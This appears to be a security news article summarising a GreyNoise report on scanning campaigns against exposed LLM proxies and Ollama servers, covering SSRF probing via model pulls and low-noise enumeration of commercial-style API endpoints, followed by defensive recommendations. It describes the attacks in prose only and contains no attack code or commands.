The digital landscape surrounding generative artificial intelligence (AI) is rapidly evolving, and with that evolution comes a burgeoning attack surface. A recent detailed analysis from threat intelligence firm GreyNoise has illuminated a systematic and sustained campaign targeting vulnerable entry points into commercial Large Language Model (LLM) services. Threat actors are actively sweeping the internet, leveraging misconfigured proxy servers and improperly secured API gateways to gain unauthorized access to paid AI resources, effectively attempting to harvest computational cycles and potentially sensitive data flows without incurring legitimate usage costs.
This concerted effort, which began in earnest in late December, is not a scattershot attack but a methodical reconnaissance operation. GreyNoise telemetry recorded probing activity across more than 73 distinct LLM endpoints, culminating in the generation of over 80,000 distinct interaction sessions across various monitored honeypots. The sophistication lies in the subtlety of the approach: the actors employ "low-noise prompts"—minimalist or innocuous queries—designed to elicit a response from the target endpoint. This technique is crucial for fingerprinting the specific AI model being accessed (e.g., GPT-4, Claude, Gemini) without triggering the anomaly detection systems often implemented by LLM providers or enterprise security teams.
The Dual Nature of the Threat Landscape
GreyNoise’s monitoring, particularly through its specialized Ollama honeypots—an open-source framework popular for running local LLMs—captured a staggering 91,403 adversarial events over the last four months, segmented into two primary, distinct campaigns. This dual-campaign structure offers critical insight into the varied motivations present in the AI security domain.
The first operation, commencing in October and remaining persistently active, exhibited characteristics suggestive of security researchers or dedicated bug bounty hunters, often referred to as "grey-hat" actors. This campaign demonstrated a clear exploitation vector targeting Server-Side Request Forgery (SSRF) vulnerabilities. SSRF flaws permit an attacker to coerce a vulnerable server into making requests to arbitrary external infrastructure controlled by the attacker. In this instance, the actors leveraged the model pull functionality inherent in the Ollama framework. By injecting malicious registry Uniform Resource Locators (URLs) or embedding Twilio SMS webhook integrations via the MediaURL parameter, they attempted to pivot the compromised server’s network connection outward.

The identification of ProjectDiscovery’s Out-of-Band Application Security Testing (OAST) infrastructure as the source for callbacks strongly supports the grey-hat hypothesis. OAST tools are standard fare in contemporary vulnerability assessment, designed to confirm the successful exploitation of vulnerabilities like SSRF by forcing a response back to the scanner’s listener. However, as GreyNoise noted in its analysis, the sheer scale of the activity, particularly the significant spike of 1,688 sessions over just 48 hours around the Christmas holiday, suggests an aggressive boundary-testing mentality beyond typical responsible disclosure efforts. The geographical origin of this initial campaign, traced through 62 IP addresses spanning 27 countries, exhibited the characteristics of Virtual Private Servers (VPS) rather than the distributed, botnet-like infrastructure associated with purely malicious operations.
The Escalation: Organized Enumeration for Profit
The second, more alarming campaign began later, on December 28th, and focused exclusively on high-volume enumeration. This operation involved only two IP addresses systematically testing over 73 unique LLM endpoints. The methodology here was purely reconnaissance-focused, probing endpoints formatted for compatibility with major commercial APIs, including those mimicking OpenAI and Google Gemini structures.
The list of targeted models, while not fully enumerated in initial reports, is understood to encompass the major proprietary offerings that require significant capital investment to access at scale. The attackers’ goal was clear: map out the available, unsecured gateways to commercial LLM compute power.
The evasion tactic employed during this enumeration phase is particularly noteworthy. To remain under the radar of rate limiting and automated abuse detection, the actors substituted typical malicious payloads with benign inputs: short greetings, empty strings, or simple factual queries. These inputs are sufficient to confirm an active, responsive LLM endpoint without generating the complex or repetitive token usage that often flags security monitoring tools.
The infrastructure associated with this second scanning effort has previously been linked to broad-spectrum vulnerability exploitation campaigns. This historical context shifts the interpretation from mere security research to organized preparatory work for large-scale abuse. While GreyNoise’s current data does not confirm post-discovery exploitation—such as data exfiltration or direct monetization of the accessed models—the investment implicit in generating 80,000 targeted requests is substantial. As researchers caution, actors do not invest this level of effort in infrastructure mapping unless they have concrete plans to capitalize on the discovered assets.

Industry Implications: The Cost of Unmanaged AI Endpoints
The proliferation of LLMs has introduced a paradigm shift in enterprise IT security. Historically, perimeter defense focused on ingress/egress control for standard web traffic and data centers. Now, every deployed LLM service, whether internally hosted via frameworks like Ollama or accessed via API gateways, represents a new, often poorly inventoried, network endpoint.
This vulnerability stems from the speed of adoption outpacing security maturity. Organizations rushed to integrate LLMs for internal tools, customer service, or code generation, often deploying them behind network configurations intended for traditional applications. Misconfigured proxies, load balancers, or cloud-native API gateways can inadvertently expose these endpoints to the public internet, bypassing necessary authentication or throttling mechanisms.
The primary financial implication is cost absorption. If an attacker successfully uses an exposed endpoint to run complex inference tasks—such as data summarization, code generation, or sophisticated prompt chaining—the legitimate owner of the API key or service account bears the substantial compute cost. For enterprises utilizing high-tier models, a sustained attack could result in tens of thousands of dollars in unexpected charges monthly.
Beyond direct financial loss, there are significant risks concerning intellectual property and data leakage. If an internal application connects a vulnerable LLM proxy to proprietary databases or sensitive internal documentation (a common practice for Retrieval-Augmented Generation, or RAG, systems), an attacker confirming endpoint access gains a potential vector for probing those connected data sources, even if the LLM itself is sandboxed.
Expert Analysis: The Shifting Definition of an Attack Surface
From a cybersecurity architecture perspective, this trend underscores the failure of relying on perimeter defenses alone in the age of distributed cloud services and AI integration. Security professionals must now treat LLM gateways as specialized network entry points requiring granular control.
.jpg)
The use of low-noise enumeration techniques highlights an arms race between attackers and AI platform providers. As providers enhance anomaly detection based on token usage patterns or query complexity, attackers adapt by using statistically insignificant queries that mimic legitimate, low-volume user interaction. This necessitates a shift toward context-aware security analysis, looking beyond simple request volume to behavioral patterns and network signatures.
The observed reliance on VPS infrastructure rather than dedicated botnets suggests that the actors are prioritizing anonymity and agility over raw speed. VPS providers are often slower to respond to abuse complaints than large-scale hosting providers typically utilized by botnets, affording the attackers a longer operational window for their reconnaissance mapping.
Future Trajectory and Mitigation Strategies
The findings serve as a clear warning that the mapping phase of LLM-focused attacks is underway. It is highly probable that the intelligence gathered from these 80,000 sessions will be weaponized in subsequent campaigns focused on exploitation, data exfiltration, or sustained cost-theft operations.
To effectively counter these evolving threats, a multi-layered defensive posture is essential:
- Strict Egress Control and Trust Boundaries: For environments running local LLM frameworks like Ollama, administrators must rigorously restrict model pulling functionality. Only whitelisted, trusted model registries should be permitted for outbound connections. Egress filtering must be applied at the network level to prevent unauthorized callbacks, effectively closing the SSRF exploitation path identified in the first campaign.
- API Gateway Hardening: All external-facing LLM endpoints must be treated with the same scrutiny as critical authentication portals. This mandates strict rate limiting based on IP, API key usage, and token volume. Furthermore, deploying Web Application Firewalls (WAFs) configured to detect known prompt injection patterns or unusual API key usage is critical, even against "low-noise" queries.
- Network Fingerprinting and Anomaly Detection: Security Operations Centers (SOCs) need to integrate advanced network telemetry. Monitoring for JA4 network fingerprints—which reveal the specific libraries and protocols used to establish a TCP connection—can help identify automated scanning tools associated with vulnerability research frameworks, even when the payload itself is benign. Monitoring traffic originating from suspicious ASN ranges associated with known adversarial VPS providers should also be prioritized.
- Adoption of Standardized Security Protocols: The industry’s move toward standards like the Model Context Protocol (MCP) for secure LLM orchestration is a positive step. Organizations adopting these emerging frameworks must ensure that security best practices—such as granular authorization and least-privilege access for AI agents—are embedded from the initial deployment phase, not bolted on later.
In conclusion, the organized enumeration targeting misconfigured LLM proxies is a definitive indicator that the AI ecosystem is now a primary target for opportunistic and sophisticated threat actors alike. The race is on to secure these new computational frontiers before the gathered reconnaissance maps are converted into active, costly breaches.
